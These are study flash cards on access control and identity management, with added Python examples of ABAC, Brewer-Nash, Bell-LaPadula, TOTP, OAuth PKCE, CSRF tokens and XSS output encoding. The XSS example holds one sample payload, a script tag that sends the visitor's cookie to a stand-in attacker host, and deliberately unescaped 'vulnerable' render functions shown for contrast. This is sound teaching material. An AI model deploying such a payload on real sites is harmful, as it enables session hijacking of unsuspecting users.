CF Domain 5 Flash Cards

1
Q

Access Control System

A

Means to ensure that access to assets is authorized and restricted based on business and security requirements (the ISO/IEC 27000 wording); the term covers both logical and physical access control systems.

2
Q

Access control tokens

A

A credential (badge, smart card, key fob or software token) presented at a reader. The system grants or denies access based on whether the token is valid for the point where it is read and under the current conditions: time, date, day of week, holiday, or any other condition the validation rules take into account.

3
Q

Accountability

A

The property that every action on a system can be traced to a uniquely identified subject. It gives account management assurance that only authorized users are accessing the system and using it properly, and it depends on identification, authentication and audit logging being in place.

4
Q

Attribute based access
control (ABAC)

A

An access control paradigm in which access is granted or denied by evaluating policies written over attributes of the subject (department, clearance), the object (owner, classification), the requested action and the environment (time, location, device), rather than by a static list of identities or roles.

5
Q

Authorization

A

The process of defining the specific resources a user needs and determining the type of access to those resources the user may have.

6
Q

Active Directory Federation Services (ADFS)

A

Microsoft identity federation component that gives client computers (internal or external to your network) seamless SSO access to protected, Internet-facing applications or services, even when the user accounts and the applications are located in completely different networks or organizations; it issues claims-based security tokens that the relying application trusts.

7
Q

Crossover Error Rate
(CER)

A

The point at which the false acceptance rate (Type II error) equals the false rejection rate (Type I error) for a given sensor, in a given system and context. It is the optimal operating point only if the impacts of both error types are equivalent, and it is the usual single figure for comparing biometric systems (lower is better). A system guarding high-value assets is normally tuned above the CER, accepting more false rejections in order to drive false acceptances down.

8
Q

Capability tables

A

Lists, kept per subject, of the privileges that subject holds and the objects it may access: the row of the access control matrix. An access control list (ACL) is the column, kept per object, naming the subjects that may access it and how.
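Added example (not part of the original flash cards): one constructed access matrix shown both ways, as capability tables (one row per subject) and as ACLs (one column per object), with a revocation that illustrates why each view suits a different administrative task. The subjects, objects and rights are invented for illustration.

```python
from collections import defaultdict

# Constructed access matrix: rows are subjects, columns are objects,
# each cell holds the rights granted. Sample data invented for this example.
ACCESS_MATRIX = {
    "alice": {"payroll.db": {"read", "write"}, "hr.db": {"read"}},
    "bob":   {"payroll.db": {"read"}},
    "carol": {"hr.db": {"read", "write"}, "audit.log": {"read"}},
}


def capability_table(matrix):
    """Subject-centric view: for each subject, the objects and rights it holds.
    This is a row of the access matrix, the capability list bound to the subject."""
    return {subject: {obj: set(rights) for obj, rights in row.items()}
            for subject, row in matrix.items()}


def access_control_lists(matrix):
    """Object-centric view: for each object, which subjects may do what.
    This is a column of the access matrix, what an ACL stored on a file holds."""
    acls = defaultdict(dict)
    for subject, row in matrix.items():
        for obj, rights in row.items():
            acls[obj][subject] = set(rights)
    return dict(acls)


def is_permitted(capabilities, subject, obj, right):
    """Authorization check against the capability table (default deny)."""
    return right in capabilities.get(subject, {}).get(obj, set())


def revoke_object(acls, capabilities, obj):
    """Revoking all access to one object is a single ACL deletion, but it has to
    be mirrored into every subject's capability list. That asymmetry is why ACLs
    suit per-object administration and capabilities suit per-subject review.
    Returns the subjects whose capabilities were changed."""
    touched = list(acls.pop(obj, {}).keys())
    for subject in touched:
        capabilities[subject].pop(obj, None)
    return touched
```

Answering "what can alice do?" is one lookup in the capability table; answering "who can touch payroll.db?" is one lookup in the ACL. Real systems usually store one form and derive the other when needed.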

9
Q

Central Authentication Service (CAS)

A

An open-source single sign-on protocol and server, originally developed at Yale University (now an Apereo project). A web application redirects the user to the CAS server, which authenticates the user and sends back a ticket; the application validates the ticket with the CAS server rather than ever seeing the user's password.

10
Q

Content-dependent control

A

Content-dependent access control adds a criterion beyond identification and authentication: the actual content the subject is attempting to access. For example, all employees of an organization may have access to the HR database to view their own accrued sick time and vacation time, but if an employee attempts to read the content of the CIO's HR record, access is denied.

11
Q

Context-dependent access control

A

Applies attributes of the circumstances of the request, rather than of its content, before granting access. Time of day is the most commonly used context; location, device, originating network and the sequence of previous requests are others.
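Added example serving the ABAC, content-dependent and context-dependent cards above (not code from the original flash cards): a small deny-overrides policy engine in which each rule is a predicate over subject, action, resource and environment attributes. The HR-record rules reproduce the card's own scenario (read your own record, not the CIO's), the business-hours rule is the context-dependent case, and the HR-staff rule is a plain attribute match. Employee IDs, departments and the 08:00-18:00 window are constructed for the example.

```python
from dataclasses import dataclass
from datetime import time
from typing import Callable


@dataclass
class Request:
    subject: dict      # attributes of the requester: employee_id, department, region
    action: str        # "read", "update", ...
    resource: dict     # attributes of the object: type, owner_id, region
    environment: dict  # attributes of the context: the current time


@dataclass
class Rule:
    name: str
    effect: str                          # "permit" or "deny"
    condition: Callable[[Request], bool]


BUSINESS_HOURS = (time(8, 0), time(18, 0))   # assumed operating window

POLICY = [
    # Context-dependent: no HR-record access outside business hours; deny overrides.
    Rule("outside_business_hours", "deny",
         lambda r: r.resource["type"] == "hr_record"
         and not (BUSINESS_HOURS[0] <= r.environment["now"] <= BUSINESS_HOURS[1])),
    # Content-dependent: an employee may read the record whose owner is themself.
    Rule("own_record", "permit",
         lambda r: r.resource["type"] == "hr_record"
         and r.action == "read"
         and r.resource["owner_id"] == r.subject["employee_id"]),
    # Attribute match: HR staff may read or update any record in their own region.
    Rule("hr_staff", "permit",
         lambda r: r.resource["type"] == "hr_record"
         and r.subject["department"] == "HR"
         and r.action in {"read", "update"}
         and r.subject["region"] == r.resource["region"]),
]


def evaluate(policy, request):
    """Deny-overrides combining: any matching deny wins, then any matching permit,
    otherwise default deny. Returns (decision, names of the rules that decided)."""
    matched = [rule for rule in policy if rule.condition(request)]
    denies = [r.name for r in matched if r.effect == "deny"]
    if denies:
        return "deny", denies
    permits = [r.name for r in matched if r.effect == "permit"]
    if permits:
        return "permit", permits
    return "deny", []


# Constructed subjects and records.
ALICE = {"employee_id": 1001, "department": "Engineering", "region": "EU"}
HELEN = {"employee_id": 2001, "department": "HR", "region": "EU"}
ALICE_RECORD = {"type": "hr_record", "owner_id": 1001, "region": "EU"}
CIO_RECORD = {"type": "hr_record", "owner_id": 1, "region": "EU"}


def decide(subject, action, resource, hour=12):
    """Convenience wrapper: evaluate POLICY at the given hour of the day."""
    req = Request(subject, action, resource, {"now": time(hour, 0)})
    return evaluate(POLICY, req)[0]
```

The point to notice is that no rule names a user: adding a new employee or a new record needs no policy change, only correct attributes on the subject and object, which is where ABAC deployments succeed or fail in practice.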

12
Q

Cross-Site Request Forgery (CSRF)

A

(AKA XSRF) An attack that forces an authenticated user's browser to submit a request to a web application against which the user is currently authenticated. Because the browser attaches the session cookie automatically, the application cannot tell the forged request from a genuine one unless it demands something the attacker's page cannot supply, such as a per-session anti-CSRF token, or checks the Origin header and uses SameSite cookies.
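Added example (not from the original flash cards): a cookie-authenticated funds-transfer handler modelled as a plain function, first as an attacker would want it and then hardened with a synchronizer token plus an Origin check. The bank.example and attacker.example origins, the session dictionary and the form fields are constructed for the example; a real application would keep the session server-side and read headers from the framework.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.example"   # assumed origin of the protected application


def issue_csrf_token(session):
    """Synchronizer token: a random value stored in the server-side session and
    embedded in each form. The attacker's page cannot read it across origins."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_same_origin(headers):
    """Independent second check: browsers send Origin (or at least Referer) on
    cross-site POSTs, so a request forged from attacker.example fails here."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False                                  # fail closed if neither is present
    parts = urlsplit(origin)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def transfer_vulnerable(session, form):
    """Before: any cookie-authenticated POST is honoured. A hidden auto-submitting
    form on another site makes the victim's browser send exactly this request,
    cookie included, and the money moves."""
    if not session.get("user"):
        return 401
    return 200


def transfer_hardened(session, form, headers):
    """After: the submitted token must match the session's token and the request
    must come from our own origin. compare_digest keeps the comparison constant
    time so the token cannot be recovered byte by byte."""
    if not session.get("user"):
        return 401
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    if not is_same_origin(headers):
        return 403
    return 200
```

Setting the session cookie with SameSite=Lax or Strict is the third, cheapest layer: the browser then omits the cookie from cross-site POSTs entirely, but the token check stays as defence in depth for older clients and for subdomain takeovers.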

13
Q

Discretionary access control
(DAC)

A

The owner of an object (the data owner) decides who gets access, typically by setting permissions or an ACL on the object, and may pass that access on to others. Contrast with MAC, where the system enforces the organization's policy and the owner cannot override it.

14
Q

False Acceptance Rate (Type
II FAR)

A

the percentage of identification instances in which unauthorized persons are incorrectly accepted.

15
Q

False Rejection Rate (Type I FRR)

A

the percentage of identification instances in which authorized persons are incorrectly rejected
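Added example serving the CER, FAR and FRR cards (not from the original flash cards): given matcher scores from genuine users and from impostors, compute FAR and FRR at a chosen threshold, then sweep the threshold to find the crossover point. The two score lists are constructed so that the rates cross exactly at 30%; a real evaluation would use thousands of samples per class.

```python
# Constructed matcher scores in [0, 1]; higher means "more like the enrolled user".
GENUINE = [0.95, 0.90, 0.85, 0.80, 0.75, 0.70, 0.60, 0.50, 0.40, 0.30]
IMPOSTOR = [0.05, 0.10, 0.15, 0.20, 0.25, 0.35, 0.45, 0.55, 0.65, 0.75]


def error_rates(genuine, impostor, threshold):
    """Scores at or above the threshold are accepted.
    FRR (Type I): fraction of genuine attempts rejected (score below threshold).
    FAR (Type II): fraction of impostor attempts accepted (score at/above threshold).
    Returns (far, frr)."""
    frr = sum(1 for s in genuine if s < threshold) / len(genuine)
    far = sum(1 for s in impostor if s >= threshold) / len(impostor)
    return far, frr


def crossover_point(genuine, impostor, steps=1000):
    """Sweep the threshold across the observed score range and return
    (threshold, far, frr) where |FAR - FRR| is smallest: the CER, also called
    the equal error rate (EER)."""
    lo, hi = min(genuine + impostor), max(genuine + impostor)
    best = None
    for i in range(steps + 1):
        t = lo + (hi - lo) * i / steps
        far, frr = error_rates(genuine, impostor, t)
        if best is None or abs(far - frr) < abs(best[1] - best[2]):
            best = (t, far, frr)
    return best


def threshold_for_max_far(genuine, impostor, max_far, steps=1000):
    """Tune for security rather than convenience: the lowest threshold whose FAR
    does not exceed max_far, together with the FRR the users will then suffer."""
    lo, hi = min(genuine + impostor), max(genuine + impostor)
    for i in range(steps + 1):
        t = lo + (hi - lo) * i / steps
        far, frr = error_rates(genuine, impostor, t)
        if far <= max_far:
            return t, far, frr
    return None
```

Raising the threshold always trades FRR for FAR; the CER is only the point where the two are equal, not a recommendation. For a data-centre door you would pick the threshold from threshold_for_max_far and accept the extra rejections.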

16
Q

Ethical Wall

A

The use of administrative, physical and logical controls to establish and enforce separation of information, assets or job functions, in order to maintain need-to-know boundaries or prevent conflict-of-interest situations; also called compartmentalization. The Brewer-Nash (Chinese Wall) model is the formal version of the conflict-of-interest case.
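Added example (not from the original flash cards): the conflict-of-interest half of an ethical wall, implemented as the Brewer-Nash read rule. Once a consultant has read data belonging to one company in a conflict class, every competitor in that class becomes off limits for that consultant; data with no conflict class (public or sanitized) is always readable. The datasets and conflict classes are constructed for the example.

```python
# Constructed conflict-of-interest classes: datasets of competing clients share a class.
# None marks sanitized or public data that belongs to no conflict class.
CONFLICT_CLASSES = {
    "bank_a": "banks",
    "bank_b": "banks",
    "oil_x": "oil",
    "oil_y": "oil",
    "public_news": None,
}


class EthicalWall:
    """Brewer-Nash (Chinese Wall) read rule. The wall is dynamic: it is built by
    the subject's own access history, not configured up front."""

    def __init__(self, classes):
        self.classes = classes
        self.history = {}          # subject -> set of datasets already read

    def may_read(self, subject, dataset):
        coi = self.classes[dataset]
        if coi is None:
            return True            # no conflict class, no restriction
        seen = self.history.get(subject, set())
        # Permitted unless the subject has already read a *different* company's
        # data in the same conflict class.
        return all(self.classes[d] != coi or d == dataset for d in seen)

    def read(self, subject, dataset):
        """Attempt a read; on success it is recorded, which may wall off competitors."""
        if not self.may_read(subject, dataset):
            return False
        self.history.setdefault(subject, set()).add(dataset)
        return True

    def blocked_for(self, subject):
        """Datasets this subject can no longer read, for an access review."""
        return sorted(d for d in self.classes if not self.may_read(subject, d))
```

The full model also constrains writes (a subject may write to a company's dataset only if it can read nothing from another company that it could not also read here), which is what stops a consultant copying bank_a's figures into oil_x's files for a colleague working for bank_b.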

17
Q

Granularity of controls

A

The level of detail at which a security function can be configured or tuned, for performance and for sensitivity; fine-grained controls act on individual objects or fields, coarse-grained ones on whole systems or groups.

18
Q

Identity as a Service
(IDaaS)

A

Cloud-based services that broker identity and access management functions to target systems on customers’ premises and/or in the cloud.

19
Q

Identity proofing

A

The process of collecting and verifying information about a person for the purpose of proving that a person who has requested an account, a credential or other special privilege is who they claim to be; it happens before a credential is issued, whereas authentication happens every time the credential is used.

20
Q

Logical access control system

A

Non-physical system that allows access based upon pre-determined policies.

21
Q

Mandatory Access Controls
(MAC)

A

Access control in which the system itself makes and enforces access decisions in accordance with the organization's security policy, typically by comparing security labels on objects (classification plus need-to-know categories) with the clearances of subjects. Neither the user nor the object's owner can override the decision, unlike DAC.
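Added example (not from the original flash cards): the label comparison a MAC system performs, using the Bell-LaPadula rules (no read up, no write down) over labels that carry both a hierarchical level and a set of need-to-know compartments. The level ordering, the compartment names and the sample subject and objects are constructed for the example; a real system would attach these labels to processes and files, as SELinux MLS or Trusted Solaris do.

```python
from dataclasses import dataclass

LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top_secret": 3}


@dataclass(frozen=True)
class Label:
    level: str
    compartments: frozenset     # need-to-know categories, e.g. {"crypto", "nuclear"}

    def dominates(self, other):
        """self dominates other when its level is at least as high AND its
        compartment set contains every compartment of other. Two labels may be
        incomparable, which is why this is a lattice and not a simple ranking."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.compartments <= self.compartments)


def mac_permits(clearance, classification, action):
    """Bell-LaPadula, enforced by the system rather than by the object's owner:
    read  -> subject's clearance must dominate the object (no read up);
    write -> object's classification must dominate the subject (no write down,
             which stops a secret-cleared process leaking into an unclassified file)."""
    if action == "read":
        return clearance.dominates(classification)
    if action == "write":
        return classification.dominates(clearance)
    raise ValueError(f"unknown action {action!r}")


def effective_access(clearance, objects):
    """Which of the given labelled objects a subject may read and which it may write."""
    readable = sorted(name for name, lab in objects.items() if mac_permits(clearance, lab, "read"))
    writable = sorted(name for name, lab in objects.items() if mac_permits(clearance, lab, "write"))
    return readable, writable


# Constructed subject clearance and object classifications.
ANALYST = Label("secret", frozenset({"crypto"}))
OBJECTS = {
    "memo":   Label("confidential", frozenset()),
    "plan":   Label("secret", frozenset({"crypto", "nuclear"})),
    "ts_doc": Label("top_secret", frozenset({"crypto"})),
    "notes":  Label("secret", frozenset({"crypto"})),
}
```

Note the deliberately surprising results: the analyst may write into ts_doc without being able to read it, and cannot read plan despite holding the same level, because the plan's nuclear compartment is missing from the clearance. A DAC owner could grant either; under MAC the system refuses regardless of who owns the file.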

22
Q

Multi factor authentication

A

Authentication that requires two or more distinct factors: something the user knows (password, PIN), something the user has (token, smart card, phone) and something the user is (biometric). Each additional factor of a different type raises the assurance that the user is who they claim to be, because an attacker must compromise more than one independent thing; two passwords are still single-factor.
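Added example (not from the original flash cards): the possession factor most organizations deploy, a time-based one-time password generated from a shared seed (RFC 6238 TOTP over RFC 4226 HOTP) with the server-side verification that tolerates clock skew. The seed below is the published RFC 6238 test seed, so the codes can be checked against the RFC's own test vectors; a real enrolment generates a fresh random seed per user.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(key: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 4226: HMAC over the big-endian 64-bit counter, dynamic truncation
    to 31 bits, then decimal modulo 10^digits, zero-padded."""
    mac = hmac.new(key, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(key: bytes, for_time: int, step: int = 30, digits: int = 6, algo=hashlib.sha1) -> str:
    """RFC 6238: HOTP whose counter is the number of `step`-second intervals
    since the Unix epoch, so client and server agree without sharing state."""
    return hotp(key, for_time // step, digits, algo)


def verify_totp(key: bytes, code: str, now=None, window: int = 1, **kw) -> bool:
    """Accept the current step and `window` steps either side for clock skew,
    comparing in constant time. A deployment must also record the last step
    accepted for the user, so the same code cannot be replayed inside its window."""
    now = int(time.time()) if now is None else now
    step = kw.get("step", 30)
    return any(hmac.compare_digest(totp(key, now + k * step, **kw), code)
               for k in range(-window, window + 1))


def provisioning_secret(key: bytes) -> str:
    """Base32 form of the seed, which is what an authenticator app is enrolled
    with (usually inside an otpauth:// URI rendered as a QR code)."""
    return base64.b32encode(key).decode().rstrip("=")


RFC6238_SEED = b"12345678901234567890"   # SHA-1 test seed from RFC 6238 Appendix B
```

The seed is the whole secret: anyone who copies it can mint every future code, so store it encrypted server-side and treat the QR code at enrolment as a one-time disclosure. TOTP is still phishable (the victim types the code into the attacker's page); FIDO2 authenticators bind the response to the origin and are not.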

23
Q

Open Authorization
(OAuth)

A

The OAuth 2.0 authorization framework enables a third-party application to obtain limited access to an HTTP service, either on behalf of a resource owner by orchestrating an approval interaction between the resource owner and the HTTP service, or by allowing the third-party application to obtain access on its own behalf. OAuth delegates authorization; it does not by itself authenticate the user, which is what OpenID Connect layers on top of it.
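Added example (not from the original flash cards, and not any library's API): both sides of the authorization-code grant with PKCE (RFC 7636), the variant public clients such as mobile and single-page apps must use. The client keeps a random code_verifier and a state value, sends only the SHA-256 challenge, checks the state on the way back, and redeems the code with the verifier; an attacker who intercepts the code cannot redeem it. The endpoints, client_id and redirect URI are assumed values, and the authorization server is a minimal in-memory model.

```python
import base64
import hashlib
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

AUTHZ_ENDPOINT = "https://auth.example/authorize"   # assumed authorization server
TOKEN_ENDPOINT = "https://auth.example/token"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def start_authorization(client_id, redirect_uri, scope):
    """Client: generate verifier and state, keep both locally, and build the
    authorization URL carrying only the S256 challenge."""
    verifier = b64url(secrets.token_bytes(32))       # 43 chars, within RFC 7636's 43..128
    challenge = b64url(hashlib.sha256(verifier.encode()).digest())
    state = secrets.token_urlsafe(16)
    params = {"response_type": "code", "client_id": client_id, "redirect_uri": redirect_uri,
              "scope": scope, "state": state,
              "code_challenge": challenge, "code_challenge_method": "S256"}
    return {"verifier": verifier, "state": state}, f"{AUTHZ_ENDPOINT}?{urlencode(params)}"


def handle_redirect(pending, redirect_url):
    """Client: refuse any callback whose state differs from the one we issued,
    otherwise an attacker can splice their own code into our session (login CSRF)."""
    q = parse_qs(urlsplit(redirect_url).query)
    if q.get("state", [None])[0] != pending["state"]:
        raise ValueError("state mismatch")
    return q["code"][0]


class AuthorizationServer:
    """Server model: binds each issued code to its challenge and redirect URI,
    makes codes single-use, and only issues a token when the verifier hashes
    to the stored challenge."""

    def __init__(self):
        self.codes = {}

    def issue_code(self, challenge, redirect_uri):
        code = secrets.token_urlsafe(16)
        self.codes[code] = (challenge, redirect_uri)
        return code

    def token(self, code, verifier, redirect_uri):
        entry = self.codes.pop(code, None)            # single use, consumed even on failure
        if entry is None:
            return None
        challenge, uri = entry
        if uri != redirect_uri or b64url(hashlib.sha256(verifier.encode()).digest()) != challenge:
            return None
        return {"access_token": secrets.token_urlsafe(24), "token_type": "Bearer"}


def demo_flows():
    """Returns (legit_ok, attacker_ok, legit_after_attack_ok) for two runs."""
    srv = AuthorizationServer()
    cb = "https://app.example/cb"
    # Run 1: the honest client end to end.
    pending, url = start_authorization("app", cb, "read")
    q = parse_qs(urlsplit(url).query)
    code = srv.issue_code(q["code_challenge"][0], q["redirect_uri"][0])   # user approved
    redirect = f"{cb}?{urlencode({'code': code, 'state': pending['state']})}"
    legit = srv.token(handle_redirect(pending, redirect), pending["verifier"], cb)
    # Run 2: the attacker sees the code (leaked redirect, malicious app on the device)
    # but never the verifier, and burns the code trying.
    pending, url = start_authorization("app", cb, "read")
    q = parse_qs(urlsplit(url).query)
    code = srv.issue_code(q["code_challenge"][0], q["redirect_uri"][0])
    attacker = srv.token(code, b64url(secrets.token_bytes(32)), cb)
    legit_after = srv.token(code, pending["verifier"], cb)
    return legit is not None, attacker is not None, legit_after is not None
```

Two things the flash card's definition hides are visible here: the resource owner's password is never seen by the client, and the access token is a bearer credential, so it must travel only over TLS and be scoped as narrowly as the requested scope allows.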

24
Q

Physical access control
system

A

An automated system that manages the passage of people or assets through an opening(s) in a secure perimeter(s) based on a set of authorization rules

25
Q

Rule based access control
(RBAC)

A

An access control model based on a list of predefined rules (for example firewall rules, or "no logins from outside the country") that determine which accesses are granted, regardless of the identity of the subject. Often written RuBAC to distinguish it from role-based access control.

26
Q

Role based access control
(RBAC)

A

An access control model that bases the access control authorizations on the roles (or functions) that the user is assigned within an organization.

27
Q

Security Assertion Markup Language 2.0 (SAML 2.0)

A

A version of the SAML OASIS standard for exchanging authentication and authorization data between security domains.

28
Q

Single factor
authentication

A

Authentication that uses only one of the three factor types (something you know, have or are) to carry out the authentication being requested; a password alone is the common case, and using two items of the same type (two passwords, or a password plus security questions) is still single-factor.

29
Q

Self-service identity management

A

Elements of the identity management lifecycle which the end user (the identity in question) can initiate or perform on their own (e.g. password reset, changes to challenge questions, registering a new device, etc.). Because self-service reset becomes an alternative login path, the strength of its verification sets the effective strength of the whole account.

30
Q

Whaling attack

A

A phishing attack aimed at highly placed officials (executives) or private individuals with sizeable assets, typically to get them to authorize large wire transfers or disclose sensitive information; the message is tailored to the target's role and often impersonates a peer or a trusted business partner.

31
Q

Cross-Site Scripting (XSS)

A

A type of injection in which malicious scripts are injected into otherwise benign and trusted websites, tricking a user's browser into executing untrusted code in the context of a trusted site. An attacker uses a web application to deliver malicious code, generally a browser-side script, to a different end user: reflected XSS echoes attacker-controlled input from the current request (a crafted link), stored XSS saves it so that it is served to every later visitor, and DOM-based XSS happens in client-side script without the server's involvement. The flaws that allow these attacks are widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it for the context (HTML body, attribute, JavaScript, URL) in which it lands.
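Added example (not from the original flash cards): a server-side page renderer that concatenates a username straight into HTML, beside the hardened version that encodes the value separately for each context it lands in, and a scheme check for links because attribute encoding alone does not neutralize a javascript: URL. The payload and the URLs are constructed for the example.

```python
import html
import json
from urllib.parse import quote

# Constructed stored-XSS payload: a "username" that exfiltrates the viewer's cookie.
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'


def render_vulnerable(username):
    """Before: raw input in the output. If the username came from the URL this is
    reflected XSS; if it came from the database, every viewer runs it (stored)."""
    return f"<p>Hello, {username}</p>"


def is_safe_link(url):
    """Encoding does not stop javascript: or data: URLs in href; whitelist the scheme."""
    return url.strip().lower().startswith(("https://", "http://"))


def render_hardened(username, profile_url):
    """After: one encoder per output context.
    - HTML text / quoted attribute: html.escape (&, <, >, ", ')
    - JavaScript string literal: json.dumps, plus escaping '<' so the value can
      never contain a literal </script> that ends the block early
    - URL query component: percent-encoding via quote()"""
    safe_text = html.escape(username, quote=True)
    safe_js = json.dumps(username).replace("<", "\\u003c")
    safe_url = quote(username, safe="")
    href = html.escape(profile_url, quote=True) if is_safe_link(profile_url) else "#"
    return (
        f"<p>Hello, {safe_text}</p>"
        f'<a href="{href}?u={safe_url}">profile</a>'
        f"<script>var user = {safe_js};</script>"
    )


def contains_active_payload(page):
    """Crude check used below: does the attacker's script tag survive intact?"""
    return "<script>document.location" in page
```

Encoding at output time, per context, is the durable fix; input validation helps but cannot know where the value will later be printed. A Content-Security-Policy that disallows inline script turns a missed encoding from cookie theft into a console error.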

32
Q

Cross-Site Tracing (XST)

A

An attack that combines Cross-Site Scripting (XSS) with the HTTP TRACE (or Microsoft's TRACK) method. TRACE echoes the received request back in the response body, including the Cookie and Authorization headers, so a script that can issue a TRACE request can read cookies that the HttpOnly flag would otherwise hide from it. Modern browsers refuse to send TRACE from script, but the server should still disable the method (for example TraceEnable off in Apache httpd), which is what a vulnerability scanner is checking when it flags TRACE as enabled.